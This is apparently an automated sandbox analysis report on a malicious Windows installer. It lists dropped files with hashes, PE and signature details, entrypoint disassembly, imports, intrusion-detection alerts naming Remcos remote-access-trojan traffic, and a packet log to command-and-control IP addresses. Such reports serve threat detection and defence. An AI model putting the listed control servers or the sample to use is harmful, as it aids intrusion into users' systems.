                                                                                                                                                                                  Process:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):222294
                                                                                                                                                                                  Entropy (8bit):1.2577793212036361
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:CRqvVaI4KC9RxN9T9vtnvZn0daCx2DLwbM+4xArw7pwAoOpZKFvb/me1P3TetAJt:I7nF9oX4+rwZeTNl1RR
                                                                                                                                                                                  MD5:14FEF3D8F0F6E481B60A7FA7F6B94033
                                                                                                                                                                                  SHA1:2021E349D958D63EAC148A2DC82479A8B31F5E1E
                                                                                                                                                                                  SHA-256:726E6DF9C645C59EEF4E8F3576F3F8A6D7124B51F4B9E24F4425EF1859B01894
                                                                                                                                                                                  SHA-512:CC36AD4A90148A9B608C6DE1FAC39311E49B61D002437FD68D1960B76F6194CA94C1110B708E33B33D58B0919471E3AD1AD83D9E0E9AAB51B07FB4FFF0681A55
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:......................................D.T...................................................(...............=.........................(...........e.................E....................................................?............J......7.............r.......&......Z.........................Y....p.................c.......de..................................................#....................../.......Q......r......................................`...o...............................g.........................................................V...................o.............V........7.........y...........................m.....C..L.......................3.........?............................{..........................................|Q..v.............................../........................Wp......................................F......................3..h.................................................................................&..........................{..........Q......O..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):292592
                                                                                                                                                                                  Entropy (8bit):7.763622792773295
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:2wDijpS4DbYccZDMH/VQRTibm2WZadkXXh+gtCyk+CebDbVs9MNoe2jDwwY9ZM+5:2FYVMH/8gm2kBA0bOKq/j0w6MpdyU
                                                                                                                                                                                  MD5:51BFAB682069E4E7A2BA7B8379D3927B
                                                                                                                                                                                  SHA1:852AC154D253E128199C7CF766D74AC8A6E9D146
                                                                                                                                                                                  SHA-256:0FFB9D8B5CC25CD280763FE84065F5F149B17EB5D9E19DD59BA6C324D292572B
                                                                                                                                                                                  SHA-512:FDA596272CA81D10D8D3C6E029D83395D7F305636F1A21E3FE147F8751C52DC162B21BFCF6FCC0FA09D0C2BDDB01E665473A1536C62BAB605C5402996F64B8BF
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...z..Y.................d...|.......1............@..................................K....@.................................4........ .. ...........Pm...............................................................................................text...Tb.......d.................. ..`.rdata..T............h..............@..@.data....U...........|..............@....ndata... ...............................rsrc... .... ......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bhv2AA3.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5e65663f, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):41943040
                                                                                                                                                                                  Entropy (8bit):1.4074095512692035
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:tmztCYitPr9MkiMpGGyVomVZPDQgGETMg9jtkoiGsS7sLhu2j0lfoBg:oi59ldGGyVhPDQgGrhu2
                                                                                                                                                                                  MD5:E69CDE3C8DC162728ADD7F00C3855219
                                                                                                                                                                                  SHA1:D16E1E9B4976202CD65841C352AA0949F9D8FA88
                                                                                                                                                                                  SHA-256:1D78A7AE6420D6E1D28A68460FDADCD4B8B5430DD0601B11B7C92C1693014B33
                                                                                                                                                                                  SHA-512:B3D54A8E4FE3217758A7B8A2E749F35D5A4E336BF37DAA6DE3A8FB0B59E72E7DA46BCA8B39D11A2407870325EFBE902C9E8C86E14363F7881E47EA869C4F5BBA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:^ef?... ........I...........*...y..........................L...82...|5..3...|S.h.!.L.........................Be ....y7.........................................................................................................bJ......n...............................................................L...L....................................... ........%...|..............................................................L...........................................................................................................................N...:....y!......................................3...|S......................3...|S.................L........#......h.!.L...................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11264
                                                                                                                                                                                  Entropy (8bit):5.76781505116372
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:MPtkumJX7zBE2kGwfy9S9VkPsFQ1Mx1c:97O2k5q9wA1Mxa
                                                                                                                                                                                  MD5:55A26D7800446F1373056064C64C3CE8
                                                                                                                                                                                  SHA1:80256857E9A0A9C8897923B717F3435295A76002
                                                                                                                                                                                  SHA-256:904FD5481D72F4E03B01A455F848DEDD095D0FB17E33608E0D849F5196FB6FF8
                                                                                                                                                                                  SHA-512:04B8AB7A85C26F188C0A06F524488D6F2AC2884BF107C860C82E94AE12C3859F825133D78338FD2B594DFC48F7DC9888AE76FEE786C6252A5C77C88755128A5B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: aMfizaMilo.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: 1ppvR5VRT6.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Ozb8aojWew.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: aMfizaMilo.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: 1ppvR5VRT6.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Ozb8aojWew.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Documents.com.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Documents.com.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: 27062024-322copy.exe, Detection: malicious, Browse
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...R..Y...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..^....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\nsExec.dll

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6656
                                                                                                                                                                                  Entropy (8bit):4.994818958746835
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:f7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNPS3e:zXhHR0aTQN4gRHdMqJVgNPR
                                                                                                                                                                                  MD5:B38561661A7164E3BBB04EDC3718FE89
                                                                                                                                                                                  SHA1:F13C873C8DB121BA21244B1E9A457204360D543F
                                                                                                                                                                                  SHA-256:C2C88E4A32C734B0CB4AE507C1A9A1B417A2375079111FB1B35FAB23AEDD41D9
                                                                                                                                                                                  SHA-512:FEDCAAC20722DE3519382011CCF22314AF3EDCD11B69F814DB14710966853B69B9B5FC98383EDCDB64D050FF825264EABA27B1C5ADFE61D1FC9D77F13A052CED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: Shipping documents 000288488599900.img, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Zincize.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Zincize.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: r14836901-5B4A-.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: r14836901-5B4A-.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Bootblacks.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Bootblacks.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Halkbank_Ekstre_06535798_98742134.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Halkbank_Ekstre_87762122_97575533.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...P..Y...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                  Entropy (8bit):7.763622792773295
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                  File name:asXlZG3aW6.exe
                                                                                                                                                                                  File size:292'592 bytes
                                                                                                                                                                                  MD5:51bfab682069e4e7a2ba7b8379d3927b
                                                                                                                                                                                  SHA1:852ac154d253e128199c7cf766d74ac8a6e9d146
                                                                                                                                                                                  SHA256:0ffb9d8b5cc25cd280763fe84065f5f149b17eb5d9e19dd59ba6c324d292572b
                                                                                                                                                                                  SHA512:fda596272ca81d10d8d3c6e029d83395d7f305636f1a21e3fe147f8751c52dc162b21bfcf6fcc0fa09d0c2bddb01e665473a1536c62bab605c5402996f64b8bf
                                                                                                                                                                                  SSDEEP:3072:2wDijpS4DbYccZDMH/VQRTibm2WZadkXXh+gtCyk+CebDbVs9MNoe2jDwwY9ZM+5:2FYVMH/8gm2kBA0bOKq/j0w6MpdyU
                                                                                                                                                                                  TLSH:6F540242FFA1C937CDB9473104799F6BAB728E2085426B87B3643F1E3C5319246AE306
                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...z..Y.................d...|.....

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:0b397c94d451730f

                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                  General

                                                                                                                                                                                  Entrypoint:0x4031f1
                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                  Time Stamp:0x597FCC7A [Tue Aug 1 00:34:02 2017 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                  Import Hash:3abe302b6d9a1256e6a915429af4ffd2

                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                  Signature Issuer:CN="xylografen taxiflyvningerne ", O=Eksaminationers, L=Tardinghen, S=Hauts-de-France, C=FR
                                                                                                                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                  Error Number:-2146762487
                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                  • 20/12/2023 04:48:51 19/12/2026 04:48:51
                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                  • CN="xylografen taxiflyvningerne ", O=Eksaminationers, L=Tardinghen, S=Hauts-de-France, C=FR
                                                                                                                                                                                  Version:3
                                                                                                                                                                                  Thumbprint MD5:1FD958E7FB10BCC3C84CB77EA385F242
                                                                                                                                                                                  Thumbprint SHA-1:21DBA15B04835DD8C468C0B729FCA0A240CB8746
                                                                                                                                                                                  Thumbprint SHA-256:A9273EAF8B8C14D37A0844ED7629802AC8C89F03E6874844922B012F12E84381
                                                                                                                                                                                  Serial:0133359A3AD4FC68D1F12D855EF725D383676E2B

                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                  Instruction
                                                                                                                                                                                  sub esp, 00000184h
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  push esi
                                                                                                                                                                                  push edi
                                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                                                                                  mov dword ptr [esp+10h], 0040A198h
                                                                                                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                                  call dword ptr [004080A0h]
                                                                                                                                                                                  call dword ptr [0040809Ch]
                                                                                                                                                                                  and eax, BFFFFFFFh
                                                                                                                                                                                  cmp ax, 00000006h
                                                                                                                                                                                  mov dword ptr [0042F40Ch], eax
                                                                                                                                                                                  je 00007F780850B253h
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  call 00007F780850E30Ah
                                                                                                                                                                                  cmp eax, ebx
                                                                                                                                                                                  je 00007F780850B249h
                                                                                                                                                                                  push 00000C00h
                                                                                                                                                                                  call eax
                                                                                                                                                                                  mov esi, 00408298h
                                                                                                                                                                                  push esi
                                                                                                                                                                                  call 00007F780850E286h
                                                                                                                                                                                  push esi
                                                                                                                                                                                  call dword ptr [00408098h]
                                                                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                  cmp byte ptr [esi], bl
                                                                                                                                                                                  jne 00007F780850B22Dh
                                                                                                                                                                                  push 0000000Ah
                                                                                                                                                                                  call 00007F780850E2DEh
                                                                                                                                                                                  push 00000008h
                                                                                                                                                                                  call 00007F780850E2D7h
                                                                                                                                                                                  push 00000006h
                                                                                                                                                                                  mov dword ptr [0042F404h], eax
                                                                                                                                                                                  call 00007F780850E2CBh
                                                                                                                                                                                  cmp eax, ebx
                                                                                                                                                                                  je 00007F780850B251h
                                                                                                                                                                                  push 0000001Eh
                                                                                                                                                                                  call eax
                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                  je 00007F780850B249h
                                                                                                                                                                                  or byte ptr [0042F40Fh], 00000040h
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  call dword ptr [00408044h]
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  call dword ptr [00408288h]
                                                                                                                                                                                  mov dword ptr [0042F4D8h], eax
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                                  push 00000160h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  push 00429830h
                                                                                                                                                                                  call dword ptr [00408178h]
                                                                                                                                                                                  push 0040A188h

                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                  Data Directories

                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85340xa0.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x420000x9220.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x46d500x9a0.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                  Sections

                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                  .text0x10000x62540x6400d550b03059038df9bf82548da8080ff6False0.6676171875data6.4338643172916266IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .rdata0x80000x13540x14005143a41b917c20afc11d259fd85b6ffcFalse0.4599609375data5.236269898436511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .data0xa0000x255180x6004c97d95c0fc95b712d16eb7b0ee5a871False0.4557291666666667data4.044625496015545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .ndata0x300000x120000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .rsrc0x420000x92200x94008c49359dc2f10c4880e9ad8ff14ecafeFalse0.6563819679054054data5.825257334851781IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                  Resources

                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                  RT_ICON0x422980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.6507439773264053
                                                                                                                                                                                  RT_ICON0x464c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6897302904564315
                                                                                                                                                                                  RT_ICON0x48a680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.74906191369606
                                                                                                                                                                                  RT_ICON0x49b100x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.7922131147540984
                                                                                                                                                                                  RT_ICON0x4a4980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8519503546099291
                                                                                                                                                                                  RT_DIALOG0x4a9000x100dataEnglishUnited States0.5234375
                                                                                                                                                                                  RT_DIALOG0x4aa000x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                  RT_DIALOG0x4ab200x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                  RT_GROUP_ICON0x4ab800x4cdataEnglishUnited States0.7763157894736842
                                                                                                                                                                                  RT_VERSION0x4abd00x30cdataEnglishUnited States0.4756410256410256
                                                                                                                                                                                  RT_MANIFEST0x4aee00x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                                                                                                                                  Imports

                                                                                                                                                                                  DLLImport
                                                                                                                                                                                  KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                                                                                                                                  USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                                                                                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-10-08T16:52:24.650841+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049735102.65.21.26443TCP
                                                                                                                                                                                  2024-10-08T16:52:33.225373+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.11.204973641.216.188.1782404TCP
                                                                                                                                                                                  2024-10-08T16:52:34.443607+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.11.204973741.216.188.1782404TCP
                                                                                                                                                                                  2024-10-08T16:52:34.459283+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.11.204973841.216.188.1782404TCP
                                                                                                                                                                                  2024-10-08T16:52:34.468675+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.11.2049740178.237.33.5080TCP
                                                                                                                                                                                  2024-10-08T16:52:34.506109+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.11.204973941.216.188.1782404TCP

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Oct 8, 2024 16:52:23.392371893 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:23.392393112 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:23.392528057 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:23.409293890 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:23.409301996 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.061996937 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.062191010 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.110626936 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.110651970 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.111072063 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.111258984 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.113223076 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.156250000 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.650846004 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.650871038 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.650993109 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.650993109 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.651005030 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.651040077 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.651088953 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.651138067 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.955769062 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.955774069 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.955836058 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.955957890 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.955957890 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.955957890 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:24.955971956 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:24.956006050 CEST49735443192.168.11.20102.65.21.26
